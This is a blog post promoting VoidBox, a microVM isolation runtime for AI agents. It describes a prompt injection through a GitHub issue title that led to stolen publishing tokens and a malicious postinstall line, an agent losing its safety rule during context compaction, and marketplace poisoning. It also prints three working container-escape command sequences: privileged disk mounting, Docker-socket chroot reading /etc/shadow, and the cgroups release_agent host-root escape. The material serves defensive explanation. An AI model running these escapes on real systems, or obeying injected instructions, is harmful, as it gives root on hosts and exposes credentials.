Your Security Team Said No to AI Agents. They Were Right

April 21, 2026 by Cristian Spinetta & Diego Parra, Void-Box Team · 16 min read

The real problem

Autonomous agents are useful. They analyze logs, summarize tickets, monitor pipelines, and generate reports without manual intervention at every step. To do that, they need access: to your filesystem, your APIs, your credentials, and often a shell where they can execute code.

That is where the problem starts. The issue is not that agents can act. The issue is that we are delegating execution to a non-deterministic system. An agent is not a fixed script. It decides what to do in real time based on context that evolves, gets compressed, and can eventually be lost.

Recent incidents around OpenClaw made that risk unusually visible, not because OpenClaw is uniquely flawed, but because the failure modes were easy to observe in public.

SecurityScorecard found tens of thousands of exposed OpenClaw instances, many of them vulnerable to remote code execution. Bitsight reported more than 30,000 exposed instances in a single analysis period from January 27 to February 8, 2026.

The risk is not limited to public exposure. CVE-2026-25253 (CVSS 8.8) showed that OpenClaw could obtain a gatewayUrl value from a query string and automatically open a WebSocket connection without prompting, sending a token value. As Conscia notes in its OpenClaw advisory, that behavior became part of a one-click RCE chain that was exploitable even against localhost-bound instances.

ClawHavoc seeded roughly 900 malicious packages into ClawHub — about one in five of everything published there. The marketplace name is incidental. The pattern appears in any ecosystem where extensions, skills, or plugins inherit the same privileges as the agent. Installing a compromised skill is functionally equivalent to giving shell access to an unknown third party.

According to Token Security, 22% of their enterprise customers had employees actively using Clawdbot. Meta banned it on corporate hardware.

But statistics still do not fully capture the problem. The clearest example is the incident involving Summer Yue, Director of Alignment at Meta Superintelligence Labs. She had connected OpenClaw to her inbox with a clear rule: don’t act without approval. As the inbox filled the context window, the model compacted its history — silently losing that safety instruction while retaining all of its system privileges. It deleted over 200 emails. Her commands to stop had no effect; she had to run to her Mac Mini and kill the process locally.

That is the confused deputy problem: an agent loses its restrictions but keeps its authority.

You do not solve that with better prompts. You solve it with boundaries that do not depend on the model.

How agents get compromised, and why containers do not save you

The intuitive answer is to run the agent in a container. That sounds reasonable. Containers are useful, familiar, fast, and sufficient for many workloads. They package processes, isolate dependencies, and make resource limits easier to manage.

But that does not make them a sufficient security boundary for autonomous agents. A container still shares a kernel with the host, so the real security boundary is still the operating system — the container is only rearranging processes inside that boundary.

In practical terms: if the agent is compromised — by prompt injection, or simply by acting outside intent — the relevant attack surface is not just “the container.” It is the shared kernel, the runtime, the mounts, the capabilities, and the sockets that make container isolation work.

Before looking at container escapes, it helps to look at how agents get compromised in the first place. Cline is a good example because the initial input was just text in a GitHub issue, and the outcome was arbitrary code execution and deployment to thousands of machines.

Clinejection: from a GitHub issue title to 4,000 compromised machines

In February 2026, security researcher Adnan Khan disclosed a vulnerability in Cline, a popular VS Code extension with more than five million users. Cline had a GitHub Actions workflow that used Claude to classify incoming issues automatically. When someone opened an issue, Claude read the title and body, then applied labels and priority.

The problem: the issue title was injected directly into Claude’s prompt with no validation. An attacker created an issue whose title contained instructions for Claude. Instead of classifying the issue, Claude interpreted those instructions as part of its workflow and executed arbitrary code.

The attack chain was straightforward:

An attacker opened an issue with a prompt injection payload in the title.
Claude interpreted it as instructions and executed code.
That code poisoned the GitHub Actions cache.
The nightly release workflow restored the poisoned cache.
The attacker obtained the publishing tokens (VSCE_PAT, OVSX_PAT, NPM_RELEASE_TOKEN).
They published [email protected] with one extra line: "postinstall": "npm install -g openclaw@latest".
The unauthorized package was live for roughly eight hours before it was deprecated.

The input was plain text in a GitHub issue title. The output was an unauthorized package release with a postinstall script that installed an autonomous agent runtime with shell access, filesystem access, and credentials on any affected machine. Snyk, The Hacker News, The Register, and Dark Reading all covered the incident.

This is not an outlier. Aikido Security documented the same pattern under the name PromptPwnd in workflows using Gemini CLI, Claude Code Actions, OpenAI Codex Actions, and GitHub AI Inference, affecting repositories at at least five Fortune 500 companies. Google patched the Gemini CLI issue four days after disclosure.

Once you accept that agent compromise is not an edge case, the important question stops being whether it can happen and becomes: what boundary remains between that agent and the host when it does?

Now add containers

Suppose someone says: “Fine, but if I run the agent in a container, the damage is contained.” That is worth testing carefully.

Containers can reduce accidental damage and make the runtime easier to manage, but they do not change the fundamental attack surface. You are still trusting a shared kernel as the security boundary. A microVM changes that because it separates guest and host with hardware-enforced virtualization, not conventions inside the same operating system.

That is why the following scenarios matter. They are not Docker trivia. They show a pattern: when isolation depends on a shared kernel, a compromised agent can still reach the host. These are three real, reproducible scenarios.

Scenario 1: Mounting the host disk from a privileged container

Few teams plan to run an agent with --privileged in production. But it appears regularly as an operational shortcut: to unlock device access, reduce friction around permissions, or make something “just work” when the agent needs more tools than expected. Once you do that, the container can access all host devices.

Here is a minimal example:

# Start a privileged container
docker run --rm -it --privileged alpine sh

# Inside the container: list host disks
fdisk -l
# Output: /dev/sda1, /dev/nvme0n1p1, etc. -- these are HOST disks

# Mount a host disk
mkdir /mnt/host
mount /dev/sda1 /mnt/host

# Done. You now have direct access to the host filesystem.
ls /mnt/host

You do not even need full --privileged. With CAP_SYS_ADMIN, the result is effectively the same:

docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined alpine sh
# Same ability to mount the host disk

Scenario 2: Escaping through a mounted Docker socket

Mounting the Docker socket is one of the most common patterns when an agent needs to orchestrate tasks, create sibling containers, or spin up auxiliary services. In practice, that is close to giving it full control over the host.

Example:

# Start a container with the Docker socket mounted
docker run --rm -it -v /var/run/docker.sock:/var/run/docker.sock docker sh

# Inside the container: create a NEW container with the host filesystem mounted
docker run --rm -it -v /:/host alpine chroot /host bash

# You are now operating as root on the host
whoami          # root
cat /etc/shadow # host passwords
ps aux          # host processes

Consequence: effective root access to the host. The agent can create arbitrary containers with arbitrary settings, mount host directories, and execute processes with privileges equivalent to the Docker daemon. The original container looked isolated, but the Docker socket is nearly a direct path to the host.

Scenario 3: A classic example of a shared-kernel boundary collapsing

This example is more sophisticated, and today it is less representative of modern defaults, but it illustrates the class of problem clearly. Using the release_agent mechanism in cgroups v1, a process inside the container can cause the host to execute an arbitrary command as root. The command runs outside the container, directly on the host.

Requirements: CAP_SYS_ADMIN and AppArmor disabled, or full --privileged.

# Start the container
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

# Inside the container: set up the escape
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

# Enable notify_on_release
echo 1 > /tmp/cgrp/x/notify_on_release

# Find the container path on the host
host_path=$(sed -n 's/.*\\perdir=\\([^,]*\\).*/\\1/p' /etc/mtab)

# Configure release_agent to execute our command ON THE HOST
echo "$host_path/cmd" > /tmp/cgrp/release_agent

# Create the script that will run on the host
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd

# Trigger: when the cgroup becomes empty, the host executes our script
sh -c "echo \\$\\$ > /tmp/cgrp/x/cgroup.procs"

# Read the output -- these are HOST processes, not container processes
sleep 1 && cat /output

Consequence: arbitrary code execution as root on the host. The cgroups v1 mechanism was designed for resource cleanup, but combined with CAP_SYS_ADMIN it becomes an escape path. The script in /cmd runs outside the container, with the full privileges of the host operating system. Replace ps aux with any other command and the outcome changes accordingly.

What these three scenarios have in common

All three exploit the same underlying property: the container and the host share a kernel. You can add more restrictions with cgroups, seccomp, or AppArmor, but you are still depending on a broad attack surface: the shared kernel, the runtime, the exposed devices, and the isolation mechanisms inside the same operating system.

Will teams intentionally run autonomous agents with --privileged? Probably not as an explicit architectural choice. But in practice, once an agent needs more tools, broader network access, arbitrary code execution, sibling containers, or environment credentials, operational concessions start to appear: extra mounts, host sockets, relaxed profiles, or additional Linux capabilities. In practice, adding one more capability can be enough to turn a contained runtime into host access.

Although both recommendations were written in response to OpenClaw, the same architectural point applies to autonomous agents more broadly: if they can execute code, they should be treated as untrusted code execution. Microsoft says this explicitly in its OpenClaw advisory: autonomous agents should be treated as untrusted code execution and run inside an isolated VM with dedicated, unprivileged credentials. Sophos reaches a similar conclusion: OpenClaw can only be operated at a reasonable level of risk inside a disposable sandbox with no access to sensitive data.

In early 2026, Ed Huang, CTO of PingCAP, published a piece that articulated something we had already been thinking about: the infrastructure problems of agents, degraded environments, side effects, lack of isolation, are the same class of problems DevOps teams solved a decade ago with containers and immutable infrastructure. His proposal was to bind each skill to an isolated, disposable execution environment. He called that unit a Box.

That framing resonated with us:

Box = Skill + Environment

But for autonomous agents that execute arbitrary code, as the examples above show, a container is not a strong enough boundary. The environment has to be a virtual machine.

That is the idea behind VoidBox, with one extension: the isolation should come from hardware virtualization, and observability should be part of the design instead of something bolted on later.

VoidBox = Agent(Skills) + Isolation

An agent’s capabilities are explicit declarations. Those declarations only become real when they are attached to an isolated execution environment. If a skill is not declared, the runtime does not wire it into the guest environment.

In OpenClaw, and in many other agent frameworks, the agent starts with a relatively broad environment and is asked to restrain itself through instructions. In VoidBox, the environment is constructed explicitly: skills, mounts, networking, and execution limits are declared up front and tied to an isolated boundary.

Go back to the Summer Yue example. Her agent lost the instruction “confirm before acting” because the model compacted its context. In OpenClaw, losing that instruction meant losing the restriction because the restriction lived in the prompt. In VoidBox, the primary restriction lives outside the prompt: the agent can only operate inside the VM created for it, with the skills mounted into that VM, only the network access explicitly enabled for it, and resource limits and timeout controls enforced by the guest-agent. The model can lose all of its context and the isolation boundary still holds.

MicroVMs, not containers

Each execution stage runs inside its own microVM. On Linux, VoidBox uses KVM. On Apple Silicon macOS, it uses Virtualization.framework. In both cases, each stage runs with its own guest kernel behind a virtualization boundary instead of as a process sharing the host kernel.

┌──────────────────────────────────────────────┐
│ Host                                         │
│  VoidBox Engine / Pipeline Orchestrator      │
│                                              │
│  ┌─────────────────────────────────────┐     │
│  │ VMM (KVM)                           │     │
│  │  vsock <-> guest-agent (PID 1)      │     │
│  │  SLIRP <-> eth0 (10.0.2.15)         │     │
│  └─────────────────────────────────────┘     │
│                                              │
│  Seccomp-BPF | OTLP export                   │
└──────────────┼───────────────────────────────┘
               │
═══════════════╪════════════════════════════════
      hardware virtualization boundary
               │
┌──────────────▼──────────────────────────────────────┐
│ Guest VM (Linux)                                    │
│  guest-agent: auth, provisioning, rlimits           │
│  agent runtime (Claude, Codex, Ollama, or other LLM)│
│  skills provisioned into isolated runtime           │
└─────────────────────────────────────────────────────┘

In a container, a kernel exploit compromises the host because the kernel is shared. In a microVM, the agent has its own kernel. An exploit inside the VM compromises the VM. The host remains separated by the hardware virtualization layer, whose attack surface is materially smaller than exposing the host kernel syscall interface directly to the workload.

The three escape scenarios above do not apply to VoidBox in the same form they do to a container. There is no Docker socket mounted by default, no host disks exposed inside the guest except for mounts that were explicitly provisioned, and the guest’s cgroups operate inside the guest kernel, not the host kernel. That does not make a microVM invulnerable, and it does not eliminate escape risk entirely. VM escape exploits exist. But the boundary changes. You stop exposing the host kernel directly and depend instead on a much smaller virtualization surface.

To make that comparison testable, we published ai-agent-security-labs: reproducible labs that run these same exploits in Docker and then repeat the same probe inside VoidBox, showing that the exploit reaches the host in the shared-kernel case and stays contained when the runtime is inside a microVM.

Each VM also includes:

An unprivileged guest user (uid 1000) so the agent runs without root inside its own VM.
Resource limits to bound processes, file descriptors, and other stage-level resources.
On Linux, controlled networking through SLIRP in user mode, with no TAP devices and no root requirement on the host.
On macOS, per-VM NAT networking provided by Virtualization.framework, although today without the same host-side policy enforcement available on Linux.
Host-guest communication over vsock, a point-to-point channel that does not traverse the network stack.
On Linux, seccomp-BPF on the host to harden the VMM process and reduce the syscall surface it uses.

Skills as declared capabilities

In practice, it looks like this:

# hackernews_agent.yaml
api_version: v1
kind: agent
name: hn_researcher

sandbox:
  mode: auto
  memory_mb: 2048
  vcpus: 4
  network: true

llm:
  provider: claude

agent:
  prompt: >
    Use the HackerNews API skill to fetch real data and write a tactical
    briefing for AI engineering teams to /workspace/output.md.
  skills:
    - 'file:examples/hackernews/skills/hackernews-api.md'
  timeout_secs: 600

The hn_researcher agent has one declared skill: access to the Hacker News API. The reasoning runtime is still claude-code, but the example makes that domain capability explicit and provisions it into the guest runtime. It has 2 GB of memory, 4 vCPUs, network access, which it needs to call the API, and a 10-minute timeout. It does not get automatic access to the host filesystem, and it does not receive additional APIs or provider configuration unless they are explicitly provisioned.

Regardless of what the model is told, the boundary around the agent — the VM, its uid-1000 sandbox, its mounts, and its network policy — is enforced by the infrastructure, not by the prompt.

This does not make prompt injection disappear. If the runtime is given general network access and tools like curl, a compromised agent can still make outbound requests. The point is that those actions are constrained to the VM’s declared capabilities and provisioned resources, not the full host.

Other design choices

Observability. Isolation without visibility creates a blind spot. VoidBox emits OTLP traces, per-stage metrics (tokens, cost, duration), and structured logs correlated with traces. Each VM also exports procfs telemetry back to the host over vsock. If you are going to run autonomous code inside isolated boundaries, you need to see what is happening inside them.

Vendor-neutral. The isolation model is not tied to a single model provider. VoidBox treats the LLM as a pluggable dependency, not as the security boundary. The point is to control execution around the model, whether the backend is Claude, Codex, Ollama, or something else.

Reproducibility. If you cannot reproduce the environment an agent ran in, you cannot reliably explain or debug what happened. VoidBox keeps the execution boundary explicit not only for containment, but also so runs can be inspected and repeated with the same runtime assumptions.

What is not covered yet

VoidBox is an isolated execution runtime. It is not, at least today, a complete enterprise platform. Several important pieces are still not covered:

Identity and authentication: there is no SSO, SAML, OIDC, or MFA yet. If your organization needs integration with an identity provider, that is not covered today.

Formal access control: the capability model is a step toward least privilege inside the runtime, but it does not yet replace organizational RBAC, approval workflows, or human review for sensitive operations.

Compliance: there are no SOC 2, HIPAA, or GDPR certifications today, and no immutable audit logs integrated with a SIEM.

Host credentials on personal-auth paths: when the provider is claude-personal or codex with ChatGPT login, the runtime stages the host’s OAuth tokens (~/.claude, ~/.codex) into the guest VM so the agent can refresh them — putting them within reach of a compromised agent inside. API-key paths (claude, custom) and local providers (ollama) are unaffected. Narrowing this boundary is part of the active threat-model work.

Supply chain: skills are declared files rather than entries in an open marketplace like the one ClawHavoc poisoned. Signing, automated scanning, and provenance checks across the artifact chain are part of the active hardening work.

Commercial support: this is an open source project with three contributors. There are no SLAs today and no commercial entity behind it.

The threat model behind VoidBox is maintained actively and evolves alongside the runtime; the points above describe its current shape, not a fixed endpoint.

The broader risk landscape here is not hypothetical. OWASP’s work on agentic applications reflects the same pattern: once agents can use tools, access data, and take actions, the security problem becomes one of constraining execution and limiting authority.

By that standard, VoidBox still does not cover the full set of requirements a large organization would expect from an enterprise-ready platform today. What it does address early is the architectural layer: sandboxing, privilege boundaries, and observability.

That difference matters because the architectural dimensions are the hardest to retrofit later. Real isolation has to be designed into the runtime early; the organizational layers sit on top of that foundation, not the other way around.

Where we are now

VoidBox is currently in the v0.2.x series. This is an early release: the architecture is in place, the APIs are still settling, and today it runs on Linux hosts with /dev/kvm and on Apple Silicon macOS through Virtualization.framework. It is written in Rust and licensed under Apache 2.0.

If you want to see the container-versus-microVM difference more concretely, the ai-agent-security-labs repository reproduces these container-based escape patterns and compares them with the same probes running inside VoidBox.

If you are evaluating how to run autonomous agents safely and hardware-isolated execution feels like the right direction, we would like your perspective: what is missing, and which assumptions we are making that we should revisit.

If an agent’s safety restrictions live only in the prompt, the agent can lose them. VoidBox moves those restrictions into the infrastructure: isolation, execution boundaries, networking, and limits are defined outside the model. It is not the only possible answer, but we believe it is a stronger foundation than treating instructions as a security boundary.